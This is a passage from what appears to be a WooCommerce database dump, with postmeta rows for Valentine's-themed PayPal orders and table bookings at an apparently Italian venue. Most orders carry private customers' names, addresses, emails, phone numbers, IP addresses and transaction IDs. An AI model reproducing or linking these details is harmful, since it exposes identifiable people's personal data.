Fee','3.75'),(14452,727,'_edit_lock','1580469331:1'),(14453,727,'_edit_last','1'),(14454,728,'_wp_attached_file','2019/02/san-valentino-2019.jpg'),(14455,728,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1600;s:4:\"file\";s:30:\"2019/02/san-valentino-2019.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"san-valentino-2019-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"san-valentino-2019-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-830x830.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"san-valentino-2019-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"san-valentino-2019-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(14456,727,'_thumbnail_id','728'),(14457,727,'_wp_page_template','default'),(14460,727,'_yoast_wpseo_content_score','90'),(14461,727,'_yoast_wpseo_primary_category','1'),(14466,288,'_low_stock_amount','0'),(14467,290,'_low_stock_amount','0'),(14470,734,'_order_key','wc_order_ZW9rXZRgV1NtS'),(14471,734,'_customer_user','36'),(14472,734,'_payment_method','paypal'),(14473,734,'_payment_method_title','PayPal'),(14474,734,'_transaction_id','7E606423YF958424X'),(14475,734,'_customer_ip_address','151.42.50.109'),(14476,734,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(14477,734,'_created_via','checkout'),(14478,734,'_date_completed',''),(14479,734,'_completed_date',''),(14480,734,'_date_paid','1549044218'),(14481,734,'_paid_date','2019-02-01 19:03:38'),(14482,734,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14483,734,'_billing_first_name','angelo'),(14484,734,'_billing_last_name','battistini'),(14485,734,'_billing_company',''),(14486,734,'_billing_address_1','via bastioni orientali 70'),(14487,734,'_billing_address_2',''),(14488,734,'_billing_city','rimini'),(14489,734,'_billing_state',''),(14490,734,'_billing_postcode',''),(14491,734,'_billing_country',''),(14492,734,'_billing_email','abattis@libero.it'),(14493,734,'_billing_phone','335340962'),(14494,734,'_shipping_first_name',''),(14495,734,'_shipping_last_name',''),(14496,734,'_shipping_company',''),(14497,734,'_shipping_address_1',''),(14498,734,'_shipping_address_2',''),(14499,734,'_shipping_city',''),(14500,734,'_shipping_state',''),(14501,734,'_shipping_postcode',''),(14502,734,'_shipping_country',''),(14503,734,'_order_currency','EUR'),(14504,734,'_cart_discount','0'),(14505,734,'_cart_discount_tax','0'),(14506,734,'_order_shipping','0.00'),(14507,734,'_order_shipping_tax','0'),(14508,734,'_order_tax','0'),(14509,734,'_order_total','30.00'),(14510,734,'_order_version','3.5.4'),(14511,734,'_prices_include_tax','no'),(14512,734,'_billing_address_index','angelo battistini  via bastioni orientali 70  rimini    abattis@libero.it 335340962'),(14513,734,'_shipping_address_index','        '),(14514,734,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14515,734,'Numero bambini fino a 6 anni','0'),(14516,734,'Numero ragazzi fino a 13 anni','0'),(14517,734,'Files attached','[]'),(14518,734,'Payment type','instant'),(14519,734,'_paypal_status','completed'),(14520,734,'_download_permissions_granted','yes'),(14521,734,'_recorded_sales','yes'),(14522,734,'_recorded_coupon_usage_counts','yes'),(14523,734,'_order_stock_reduced','yes'),(14524,734,'PayPal Transaction Fee','1.37'),(14525,735,'_order_key','wc_order_vJ1qBCQCQHfHW'),(14526,735,'_customer_user','37'),(14527,735,'_payment_method','paypal'),(14528,735,'_payment_method_title','PayPal'),(14529,735,'_transaction_id','44F90121MS725804E'),(14530,735,'_customer_ip_address','95.248.165.229'),(14531,735,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(14532,735,'_created_via','checkout'),(14533,735,'_date_completed',''),(14534,735,'_completed_date',''),(14535,735,'_date_paid','1549089116'),(14536,735,'_paid_date','2019-02-02 07:31:56'),(14537,735,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14538,735,'_billing_first_name','Luca'),(14539,735,'_billing_last_name','Semprini'),(14540,735,'_billing_company',''),(14541,735,'_billing_address_1','Via Sant\'Andrea, 12'),(14542,735,'_billing_address_2',''),(14543,735,'_billing_city','Montescudo'),(14544,735,'_billing_state',''),(14545,735,'_billing_postcode',''),(14546,735,'_billing_country',''),(14547,735,'_billing_email','lucasemprini23@gmail.com'),(14548,735,'_billing_phone','3493660385'),(14549,735,'_shipping_first_name',''),(14550,735,'_shipping_last_name',''),(14551,735,'_shipping_company',''),(14552,735,'_shipping_address_1',''),(14553,735,'_shipping_address_2',''),(14554,735,'_shipping_city',''),(14555,735,'_shipping_state',''),(14556,735,'_shipping_postcode',''),(14557,735,'_shipping_country',''),(14558,735,'_order_currency','EUR'),(14559,735,'_cart_discount','0'),(14560,735,'_cart_discount_tax','0'),(14561,735,'_order_shipping','0.00'),(14562,735,'_order_shipping_tax','0'),(14563,735,'_order_tax','0'),(14564,735,'_order_total','30.00'),(14565,735,'_order_version','3.5.4'),(14566,735,'_prices_include_tax','no'),(14567,735,'_billing_address_index','Luca Semprini  Via Sant\'Andrea, 12  Montescudo    lucasemprini23@gmail.com 3493660385'),(14568,735,'_shipping_address_index','        '),(14569,735,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14570,735,'Numero bambini fino a 6 anni','0'),(14571,735,'Numero ragazzi fino a 13 anni','0'),(14572,735,'Files attached','[]'),(14573,735,'Payment type','instant'),(14574,735,'_paypal_status','completed'),(14575,735,'_download_permissions_granted','yes'),(14576,735,'_recorded_sales','yes'),(14577,735,'_recorded_coupon_usage_counts','yes'),(14578,735,'_order_stock_reduced','yes'),(14579,735,'PayPal Transaction Fee','1.37'),(14580,736,'_order_key','wc_order_CnqM0iP3aq8nD'),(14581,736,'_customer_user','38'),(14582,736,'_payment_method','paypal'),(14583,736,'_payment_method_title','PayPal'),(14584,736,'_transaction_id',''),(14585,736,'_customer_ip_address','93.40.215.105'),(14586,736,'_customer_user_agent','Mozilla/5.0 (Linux; Android 8.0.0; SM-G935F Build/R16NW; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/72.0.3626.76 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/206.0.0.36.105;]'),(14587,736,'_created_via','checkout'),(14588,736,'_date_completed',''),(14589,736,'_completed_date',''),(14590,736,'_date_paid',''),(14591,736,'_paid_date',''),(14592,736,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14593,736,'_billing_first_name','Nicola'),(14594,736,'_billing_last_name','Zoli'),(14595,736,'_billing_company',''),(14596,736,'_billing_address_1','Via Torino campani 20 int 5'),(14597,736,'_billing_address_2',''),(14598,736,'_billing_city','Forli'),(14599,736,'_billing_state',''),(14600,736,'_billing_postcode',''),(14601,736,'_billing_country',''),(14602,736,'_billing_email','Nicola.zolikm@gmail.com'),(14603,736,'_billing_phone','3453859744'),(14604,736,'_shipping_first_name',''),(14605,736,'_shipping_last_name',''),(14606,736,'_shipping_company',''),(14607,736,'_shipping_address_1',''),(14608,736,'_shipping_address_2',''),(14609,736,'_shipping_city',''),(14610,736,'_shipping_state',''),(14611,736,'_shipping_postcode',''),(14612,736,'_shipping_country',''),(14613,736,'_order_currency','EUR'),(14614,736,'_cart_discount','0'),(14615,736,'_cart_discount_tax','0'),(14616,736,'_order_shipping','0.00'),(14617,736,'_order_shipping_tax','0'),(14618,736,'_order_tax','0'),(14619,736,'_order_total','30.00'),(14620,736,'_order_version','3.5.4'),(14621,736,'_prices_include_tax','no'),(14622,736,'_billing_address_index','Nicola Zoli  Via Torino campani 20 int 5  Forli    Nicola.zolikm@gmail.com 3453859744'),(14623,736,'_shipping_address_index','        '),(14624,736,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14625,736,'Numero bambini fino a 6 anni','0'),(14626,736,'Numero ragazzi fino a 13 anni','0'),(14627,736,'Files attached','[]'),(14628,737,'_order_key','wc_order_4i6qoiAn9xGGP'),(14629,737,'_customer_user','38'),(14630,737,'_payment_method','paypal'),(14631,737,'_payment_method_title','PayPal'),(14632,737,'_transaction_id','47N17165M4138371W'),(14633,737,'_customer_ip_address','79.43.243.202'),(14634,737,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(14635,737,'_created_via','checkout'),(14636,737,'_date_completed',''),(14637,737,'_completed_date',''),(14638,737,'_date_paid','1549272985'),(14639,737,'_paid_date','2019-02-04 10:36:25'),(14640,737,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14641,737,'_billing_first_name','Nicola'),(14642,737,'_billing_last_name','Zoli'),(14643,737,'_billing_company',''),(14644,737,'_billing_address_1','Via Torino campani 20 int 5'),(14645,737,'_billing_address_2',''),(14646,737,'_billing_city','Forli'),(14647,737,'_billing_state',''),(14648,737,'_billing_postcode',''),(14649,737,'_billing_country',''),(14650,737,'_billing_email','Nicola.zolikm@gmail.com'),(14651,737,'_billing_phone','3453859744'),(14652,737,'_shipping_first_name',''),(14653,737,'_shipping_last_name',''),(14654,737,'_shipping_company',''),(14655,737,'_shipping_address_1',''),(14656,737,'_shipping_address_2',''),(14657,737,'_shipping_city',''),(14658,737,'_shipping_state',''),(14659,737,'_shipping_postcode',''),(14660,737,'_shipping_country',''),(14661,737,'_order_currency','EUR'),(14662,737,'_cart_discount','0'),(14663,737,'_cart_discount_tax','0'),(14664,737,'_order_shipping','0.00'),(14665,737,'_order_shipping_tax','0'),(14666,737,'_order_tax','0'),(14667,737,'_order_total','30.00'),(14668,737,'_order_version','3.5.4'),(14669,737,'_prices_include_tax','no'),(14670,737,'_billing_address_index','Nicola Zoli  Via Torino campani 20 int 5  Forli    Nicola.zolikm@gmail.com 3453859744'),(14671,737,'_shipping_address_index','        '),(14672,737,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14673,737,'Numero bambini fino a 6 anni','0'),(14674,737,'Numero ragazzi fino a 13 anni','0'),(14675,737,'Files attached','[]'),(14676,737,'Payment type','instant'),(14677,737,'_paypal_status','completed'),(14678,737,'_download_permissions_granted','yes'),(14679,737,'_recorded_sales','yes'),(14680,737,'_recorded_coupon_usage_counts','yes'),(14681,737,'_order_stock_reduced','yes'),(14682,737,'PayPal Transaction Fee','1.37'),(14683,738,'_order_key','wc_order_7z3NHjdJFSMJJ'),(14684,738,'_customer_user','0'),(14685,738,'_payment_method','paypal'),(14686,738,'_payment_method_title','PayPal'),(14687,738,'_transaction_id',''),(14688,738,'_customer_ip_address','80.19.52.50'),(14689,738,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'),(14690,738,'_created_via','checkout'),(14691,738,'_date_completed',''),(14692,738,'_completed_date',''),(14693,738,'_date_paid',''),(14694,738,'_paid_date',''),(14695,738,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14696,738,'_billing_first_name','nicolò'),(14697,738,'_billing_last_name','manduchi'),(14698,738,'_billing_company',''),(14699,738,'_billing_address_1','via s. maria in cerreto'),(14700,738,'_billing_address_2',''),(14701,738,'_billing_city','rimini'),(14702,738,'_billing_state',''),(14703,738,'_billing_postcode',''),(14704,738,'_billing_country',''),(14705,738,'_billing_email','mandu92@hotmail.it'),(14706,738,'_billing_phone','3475575645'),(14707,738,'_shipping_first_name',''),(14708,738,'_shipping_last_name',''),(14709,738,'_shipping_company',''),(14710,738,'_shipping_address_1',''),(14711,738,'_shipping_address_2',''),(14712,738,'_shipping_city',''),(14713,738,'_shipping_state',''),(14714,738,'_shipping_postcode',''),(14715,738,'_shipping_country',''),(14716,738,'_order_currency','EUR'),(14717,738,'_cart_discount','0'),(14718,738,'_cart_discount_tax','0'),(14719,738,'_order_shipping','0.00'),(14720,738,'_order_shipping_tax','0'),(14721,738,'_order_tax','0'),(14722,738,'_order_total','30.00'),(14723,738,'_order_version','3.5.4'),(14724,738,'_prices_include_tax','no'),(14725,738,'_billing_address_index','nicolò manduchi  via s. maria in cerreto  rimini    mandu92@hotmail.it 3475575645'),(14726,738,'_shipping_address_index','        '),(14727,738,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14728,738,'Numero bambini fino a 6 anni','0'),(14729,738,'Numero ragazzi fino a 13 anni','0'),(14730,738,'Files attached','[]'),(14731,739,'_order_key','wc_order_9ZGDOxkNE6SJZ'),(14732,739,'_customer_user','0'),(14733,739,'_payment_method','paypal'),(14734,739,'_payment_method_title','PayPal'),(14735,739,'_transaction_id','2M696489VN3189543'),(14736,739,'_customer_ip_address','109.235.108.117'),(14737,739,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(14738,739,'_created_via','checkout'),(14739,739,'_date_completed',''),(14740,739,'_completed_date',''),(14741,739,'_date_paid','1549435232'),(14742,739,'_paid_date','2019-02-06 07:40:32'),(14743,739,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14744,739,'_billing_first_name','Giuseppe'),(14745,739,'_billing_last_name','Pagano'),(14746,739,'_billing_company',''),(14747,739,'_billing_address_1','Strada selve Belle'),(14748,739,'_billing_address_2',''),(14749,739,'_billing_city','San Marino'),(14750,739,'_billing_state',''),(14751,739,'_billing_postcode',''),(14752,739,'_billing_country',''),(14753,739,'_billing_email','g_pagano@live.it'),(14754,739,'_billing_phone','3336688669'),(14755,739,'_shipping_first_name',''),(14756,739,'_shipping_last_name',''),(14757,739,'_shipping_company',''),(14758,739,'_shipping_address_1',''),(14759,739,'_shipping_address_2',''),(14760,739,'_shipping_city',''),(14761,739,'_shipping_state',''),(14762,739,'_shipping_postcode',''),(14763,739,'_shipping_country',''),(14764,739,'_order_currency','EUR'),(14765,739,'_cart_discount','0'),(14766,739,'_cart_discount_tax','0'),(14767,739,'_order_shipping','0.00'),(14768,739,'_order_shipping_tax','0'),(14769,739,'_order_tax','0'),(14770,739,'_order_total','30.00'),(14771,739,'_order_version','3.5.4'),(14772,739,'_prices_include_tax','no'),(14773,739,'_billing_address_index','Giuseppe Pagano  Strada selve Belle  San Marino    g_pagano@live.it 3336688669'),(14774,739,'_shipping_address_index','        '),(14775,739,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14776,739,'Numero bambini fino a 6 anni','0'),(14777,739,'Numero ragazzi fino a 13 anni','0'),(14778,739,'Files attached','[]'),(14779,739,'Payment type','instant'),(14780,739,'_paypal_status','completed'),(14781,739,'_download_permissions_granted','yes'),(14782,739,'_recorded_sales','yes'),(14783,739,'_recorded_coupon_usage_counts','yes'),(14784,739,'_order_stock_reduced','yes'),(14785,739,'PayPal Transaction Fee','1.37'),(14786,740,'_order_key','wc_order_j8lzilRFwmnn6'),(14787,740,'_customer_user','0'),(14788,740,'_payment_method','paypal'),(14789,740,'_payment_method_title','PayPal'),(14790,740,'_transaction_id','3TJ62625PP682050T'),(14791,740,'_customer_ip_address','93.71.238.88'),(14792,740,'_customer_user_agent','Mozilla/5.0 (Linux; Android 7.0; PRA-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36'),(14793,740,'_created_via','checkout'),(14794,740,'_date_completed',''),(14795,740,'_completed_date',''),(14796,740,'_date_paid','1549568883'),(14797,740,'_paid_date','2019-02-07 20:48:03'),(14798,740,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14799,740,'_billing_first_name','Silvia'),(14800,740,'_billing_last_name','Winter'),(14801,740,'_billing_company',''),(14802,740,'_billing_address_1','via f.li bandiera 45'),(14803,740,'_billing_address_2',''),(14804,740,'_billing_city','riccione'),(14805,740,'_billing_state',''),(14806,740,'_billing_postcode',''),(14807,740,'_billing_country',''),(14808,740,'_billing_email','fratewin@alice.it'),(14809,740,'_billing_phone','3471131393'),(14810,740,'_shipping_first_name',''),(14811,740,'_shipping_last_name',''),(14812,740,'_shipping_company',''),(14813,740,'_shipping_address_1',''),(14814,740,'_shipping_address_2',''),(14815,740,'_shipping_city',''),(14816,740,'_shipping_state',''),(14817,740,'_shipping_postcode',''),(14818,740,'_shipping_country',''),(14819,740,'_order_currency','EUR'),(14820,740,'_cart_discount','0'),(14821,740,'_cart_discount_tax','0'),(14822,740,'_order_shipping','0.00'),(14823,740,'_order_shipping_tax','0'),(14824,740,'_order_tax','0'),(14825,740,'_order_total','30.00'),(14826,740,'_order_version','3.5.4'),(14827,740,'_prices_include_tax','no'),(14828,740,'_billing_address_index','Silvia Winter  via f.li bandiera 45  riccione    fratewin@alice.it 3471131393'),(14829,740,'_shipping_address_index','        '),(14830,740,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14831,740,'Numero bambini fino a 6 anni','0'),(14832,740,'Numero ragazzi fino a 13 anni','0'),(14833,740,'Files attached','[]'),(14834,740,'Payment type','instant'),(14835,740,'_paypal_status','completed'),(14836,740,'_download_permissions_granted','yes'),(14837,740,'_recorded_sales','yes'),(14838,740,'_recorded_coupon_usage_counts','yes'),(14839,740,'_order_stock_reduced','yes'),(14840,740,'PayPal Transaction Fee','1.37'),(14841,741,'_order_key','wc_order_8OFF45A3IUvFz'),(14842,741,'_customer_user','39'),(14843,741,'_payment_method','paypal'),(14844,741,'_payment_method_title','PayPal'),(14845,741,'_transaction_id','9DV93979J6048891X'),(14846,741,'_customer_ip_address','95.252.185.1'),(14847,741,'_customer_user_agent','Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG SM-N950F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/8.2 Chrome/63.0.3239.111 Mobile Safari/537.36'),(14848,741,'_created_via','checkout'),(14849,741,'_date_completed',''),(14850,741,'_completed_date',''),(14851,741,'_date_paid','1549634432'),(14852,741,'_paid_date','2019-02-08 15:00:32'),(14853,741,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14854,741,'_billing_first_name','Federico'),(14855,741,'_billing_last_name','Tordi'),(14856,741,'_billing_company',''),(14857,741,'_billing_address_1',''),(14858,741,'_billing_address_2',''),(14859,741,'_billing_city',''),(14860,741,'_billing_state',''),(14861,741,'_billing_postcode',''),(14862,741,'_billing_country',''),(14863,741,'_billing_email','fedytordi@gmail.com'),(14864,741,'_billing_phone','3334259527'),(14865,741,'_shipping_first_name',''),(14866,741,'_shipping_last_name',''),(14867,741,'_shipping_company',''),(14868,741,'_shipping_address_1',''),(14869,741,'_shipping_address_2',''),(14870,741,'_shipping_city',''),(14871,741,'_shipping_state',''),(14872,741,'_shipping_postcode',''),(14873,741,'_shipping_country',''),(14874,741,'_order_currency','EUR'),(14875,741,'_cart_discount','0'),(14876,741,'_cart_discount_tax','0'),(14877,741,'_order_shipping','0.00'),(14878,741,'_order_shipping_tax','0'),(14879,741,'_order_tax','0'),(14880,741,'_order_total','30.00'),(14881,741,'_order_version','3.5.4'),(14882,741,'_prices_include_tax','no'),(14883,741,'_billing_address_index','Federico Tordi        fedytordi@gmail.com 3334259527'),(14884,741,'_shipping_address_index','        '),(14885,741,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14886,741,'Numero bambini fino a 6 anni','0'),(14887,741,'Numero ragazzi fino a 13 anni','0'),(14888,741,'Files attached','[]'),(14889,741,'Payment type','instant'),(14890,741,'_paypal_status','completed'),(14891,741,'_download_permissions_granted','yes'),(14892,741,'_recorded_sales','yes'),(14893,741,'_recorded_coupon_usage_counts','yes'),(14894,741,'_order_stock_reduced','yes'),(14895,741,'PayPal Transaction Fee','1.37'),(14896,743,'_order_key','wc_order_o3kinwVlFG7ys'),(14897,743,'_customer_user','0'),(14898,743,'_payment_method','paypal'),(14899,743,'_payment_method_title','PayPal'),(14900,743,'_transaction_id','5FU443149E506482D'),(14901,743,'_customer_ip_address','5.171.192.100'),(14902,743,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D39 [FBAN/MessengerForiOS;FBAV/200.0.0.27.103;FBBV/139866222;FBDV/iPhone9,3;FBMD/iPhone;FBSN/iOS;FBSV/12.1.3;FBSS/2;FBCR/Carrier;FBID/phone;FBLC/it_IT;FBOP/5]'),(14903,743,'_created_via','checkout'),(14904,743,'_date_completed',''),(14905,743,'_completed_date',''),(14906,743,'_date_paid','1549800756'),(14907,743,'_paid_date','2019-02-10 13:12:36'),(14908,743,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14909,743,'_billing_first_name','Manuel'),(14910,743,'_billing_last_name','Ricci'),(14911,743,'_billing_company',''),(14912,743,'_billing_address_1',''),(14913,743,'_billing_address_2',''),(14914,743,'_billing_city',''),(14915,743,'_billing_state',''),(14916,743,'_billing_postcode',''),(14917,743,'_billing_country',''),(14918,743,'_billing_email','m_ricci@live.it'),(14919,743,'_billing_phone','3293853650'),(14920,743,'_shipping_first_name',''),(14921,743,'_shipping_last_name',''),(14922,743,'_shipping_company',''),(14923,743,'_shipping_address_1',''),(14924,743,'_shipping_address_2',''),(14925,743,'_shipping_city',''),(14926,743,'_shipping_state',''),(14927,743,'_shipping_postcode',''),(14928,743,'_shipping_country',''),(14929,743,'_order_currency','EUR'),(14930,743,'_cart_discount','0'),(14931,743,'_cart_discount_tax','0'),(14932,743,'_order_shipping','0.00'),(14933,743,'_order_shipping_tax','0'),(14934,743,'_order_tax','0'),(14935,743,'_order_total','30.00'),(14936,743,'_order_version','3.5.4'),(14937,743,'_prices_include_tax','no'),(14938,743,'_billing_address_index','Manuel Ricci        m_ricci@live.it 3293853650'),(14939,743,'_shipping_address_index','        '),(14940,743,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14941,743,'Numero bambini fino a 6 anni','0'),(14942,743,'Numero ragazzi fino a 13 anni','0'),(14943,743,'Files attached','[]'),(14944,743,'Payment type','instant'),(14945,743,'_paypal_status','completed'),(14946,743,'_download_permissions_granted','yes'),(14947,743,'_recorded_sales','yes'),(14948,743,'_recorded_coupon_usage_counts','yes'),(14949,743,'_order_stock_reduced','yes'),(14950,743,'PayPal Transaction Fee','1.37'),(14951,744,'_order_key','wc_order_wdA8PhCz3zQFy'),(14952,744,'_customer_user','40'),(14953,744,'_payment_method','paypal'),(14954,744,'_payment_method_title','PayPal'),(14955,744,'_transaction_id','3YE64216PV092324U'),(14956,744,'_customer_ip_address','151.42.211.102'),(14957,744,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(14958,744,'_created_via','checkout'),(14959,744,'_date_completed',''),(14960,744,'_completed_date',''),(14961,744,'_date_paid','1549836303'),(14962,744,'_paid_date','2019-02-10 23:05:03'),(14963,744,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(14964,744,'_billing_first_name','Christopher'),(14965,744,'_billing_last_name','Andruccioli'),(14966,744,'_billing_company',''),(14967,744,'_billing_address_1',''),(14968,744,'_billing_address_2',''),(14969,744,'_billing_city',''),(14970,744,'_billing_state',''),(14971,744,'_billing_postcode',''),(14972,744,'_billing_country',''),(14973,744,'_billing_email','christopherandruccioli54@gmail.com'),(14974,744,'_billing_phone','393661364569'),(14975,744,'_shipping_first_name',''),(14976,744,'_shipping_last_name',''),(14977,744,'_shipping_company',''),(14978,744,'_shipping_address_1',''),(14979,744,'_shipping_address_2',''),(14980,744,'_shipping_city',''),(14981,744,'_shipping_state',''),(14982,744,'_shipping_postcode',''),(14983,744,'_shipping_country',''),(14984,744,'_order_currency','EUR'),(14985,744,'_cart_discount','0'),(14986,744,'_cart_discount_tax','0'),(14987,744,'_order_shipping','0.00'),(14988,744,'_order_shipping_tax','0'),(14989,744,'_order_tax','0'),(14990,744,'_order_total','30.00'),(14991,744,'_order_version','3.5.4'),(14992,744,'_prices_include_tax','no'),(14993,744,'_billing_address_index','Christopher Andruccioli        christopherandruccioli54@gmail.com 393661364569'),(14994,744,'_shipping_address_index','        '),(14995,744,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(14996,744,'Numero bambini fino a 6 anni','0'),(14997,744,'Numero ragazzi fino a 13 anni','0'),(14998,744,'Files attached','[]'),(14999,744,'Payment type','instant'),(15000,744,'_paypal_status','completed'),(15001,744,'_download_permissions_granted','yes'),(15002,744,'_recorded_sales','yes'),(15003,744,'_recorded_coupon_usage_counts','yes'),(15004,744,'_order_stock_reduced','yes'),(15005,744,'PayPal Transaction Fee','1.37'),(15006,745,'_order_key','wc_order_FNhjkvrotekIU'),(15007,745,'_customer_user','41'),(15008,745,'_payment_method','paypal'),(15009,745,'_payment_method_title','PayPal'),(15010,745,'_transaction_id','4CD36617196961912'),(15011,745,'_customer_ip_address','77.93.248.29'),(15012,745,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),(15013,745,'_created_via','checkout'),(15014,745,'_date_completed',''),(15015,745,'_completed_date',''),(15016,745,'_date_paid','1549878209'),(15017,745,'_paid_date','2019-02-11 10:43:29'),(15018,745,'_cart_hash','60d48b6d9b927fffe02528a2ae802c73'),(15019,745,'_billing_first_name','FAUSTO'),(15020,745,'_billing_last_name','TERENZI'),(15021,745,'_billing_company',''),(15022,745,'_billing_address_1','VIA MINCIO 9'),(15023,745,'_billing_address_2',''),(15024,745,'_billing_city','MORCIANO DI 